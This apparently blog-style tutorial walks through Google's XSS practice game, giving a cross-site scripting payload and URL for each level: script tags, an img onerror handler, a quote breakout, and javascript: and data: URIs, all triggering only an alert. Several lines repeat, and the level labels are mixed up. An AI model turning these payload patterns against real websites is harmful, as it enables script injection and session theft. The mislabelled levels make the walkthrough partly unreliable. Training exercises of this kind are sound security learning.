Google's New XSS Game : Tricky But Simple [ How to Solve ? ]
Google's New XSS Game : Tricky But Simple [
How to Solve ? ]
Team Google recently released a
browser based XSS challenge for security researchers . In this Tutorial we are
going to take a look at how to solve this XSS challenge . So here we
go
First of all head over to the game area . In my opinion this challenge is
pretty simply but some levels are li tricky .
This will be the home page. Click That Green Button To start ;)
Level 1: Hello world of XSS
So as the title of this Level says use the basic XSS payload ie. <script>alert('xss')</script>
Now the Url will be like : https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
So as the title of this Level says use the basic XSS payload ie. <script>alert('xss')</script>
Now the Url will be like : https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Level 2 : Persistence is the key
Payload : <img src='whp' onerror='alert("xss")'>
Payload : <img src='whp' onerror='alert("xss")'>
Url : https://xss-game.appspot.com/level2/frame
post-content=<img src='whp' onerror='alert("xss")'>
post-content=<img src='whp' onerror='alert("xss")'>
Level 3 : That sinking feeling !
Payload : ');alert('xss
Url : https://xss-game.appspot.com/level4/frame
timer=');alert('xss
Level 5 : Breaking Protocols
Payload : javascript:alert('xss')
Url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level 5 : Follow the X
Url : https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
AND YOUR CAK3 IS R3ADY
Thank You For Reading :)
